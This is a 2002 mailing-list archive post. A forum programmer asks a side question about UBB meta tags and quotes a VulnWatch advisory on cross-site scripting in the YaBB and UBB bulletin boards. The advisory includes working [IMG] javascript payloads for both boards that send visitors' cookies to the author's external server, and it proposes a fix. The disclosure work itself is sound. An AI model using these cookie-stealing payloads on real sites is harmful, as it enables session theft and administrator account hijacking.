Hi, Now talking about UBB.. I found out that when I add an Insert Header meta tag in UBB's control panel, it is added twice.... How come? Greetings from Holland, Raymond Vrolijk Programmer http://www.veronica.nl ----- Original Message ----- From: "Obscure" <obscureat_private> To: <vulnwatchat_private> Sent: Wednesday, January 09, 2002 6:35 PM Subject: [VulnWatch] CSS vulnerabilities in YaBB and UBB allow account hijack [Multiple Vendor] > Advisory Title: CSS vulnerabilities in YaBB and UBB allow account hijack > [Multiple Vendor] > Release Date: 08/01/2002 > > Application: YaBB and UBB > > > Platform: Any system supporting PERL. > > Build - > YaBB : 1 Gold - Service Pack 1 - older versions were effected in the same > way. > UBB : Ultimate Bulletin BoardTM 6.2.0 Beta Release 1.0 > > > Severity: Malicious users can steal session cookies, allowing administrative > access to the bulletin board. > > Author: > Obscure^ > [ obscureat_private ] > > Vendor Status: > YaBB - Informed on 01 Jan 2002, should fix some time in the future ... > UBB - Informed on 08 Jan 2002, should issue a fix on 09 Jan 2002 (seems like > they knew about the issue). > > Web: > > http://yabb.xnull.com > http://www.infopop.com/products/ubb/ > http://eyeonsecurity.net/advisories/css_in_yabb_and_ubb.html > > > Background. > > (extracted from > http://yabb.xnull.com) > > YaBB is a leading provider of FREE, downloadable Perl forums for webmasters, > with currently over 50,000 web communities using YaBB worldwide, and over 1 > million registered users througout these forums! Join the messaging > revolution; > keep visitors coming back.... > > (extracted from > http://www.infopop.com/products/ubb/) > The Ultimate Bulletin Board (UBB)T is the most widely adopted Perl message > board on > the Web. With a solid five year development history, and worldwide > familiarity, it is easy to > use and maintain. > > Problem. > > When a user inserts [IMG]url[/IMG], YaBB changes that text to <img > src='url'>. > If someone inserts javascript:alert() instead of the url, the javascript > code > is executed by Internet Explorer or some other web browsers. This allows > stealing > of cookie data and other interesting things. YaBB has filtered the > javascript > method, however it does not take into consideration that javascript: can be > encoded using standard HTML hex and ASCII encoding. Same with UBB. > In UBB I need to encode several strings because they added checking for > certain > keywords such as cookie. > In my example I change javascript: to javascript: > > > Exploit Example. > > Inserting a new topic (or reply) with the following text will send visitor's > cookies > to Eye on Security. The output is saved to > http://eyeonsecurity.net/tools/cookies.txt . > Cookies will contain the password in the case of UBB and a session cookie > (or encoded > password) in YaBB. > > -- snap YaBB -- > > [img]javascript:document.write > ('<img > src=http://eyeonsecurity.net/tools/cookie.plx?cookie='+escape(docu > ment.cookie)+'>') > [/img]. > > -- snap YaBB -- > > -- snap UBB -- > > [IMG]javascript:document.write > ('<img%20src=http://eyeonsecurity.net/tools/cookie.plx? > > cookie='+escape(document.cookie)+'>') > [/IMG] > > -- snap UBB -- > > > Fix. > > IMG tags should start with http, so that Javascript: and other goodies (play > with mailto:) > are not allowed. > > > Note. > > Other Bulletin Board Systems may also be vulnerable to these attacks. > > > Disclaimer. > > The information within this document may change without notice. Use of > this information constitutes acceptance for use in an AS IS > condition. There are NO warranties with regard to this information. > In no event shall the author be liable for any consequences whatsoever > arising out of or in connection with the use or spread of this > information. Any use of this information lays within the user's > responsibility. > > > Feedback. > > Please send suggestions, updates, and comments to: > > Eye on Security > mail : obscureat_private > web : http://www.eyeonsecurity.net > >
This archive was generated by hypermail 2b30 : Thu Jan 17 2002 - 11:04:04 PST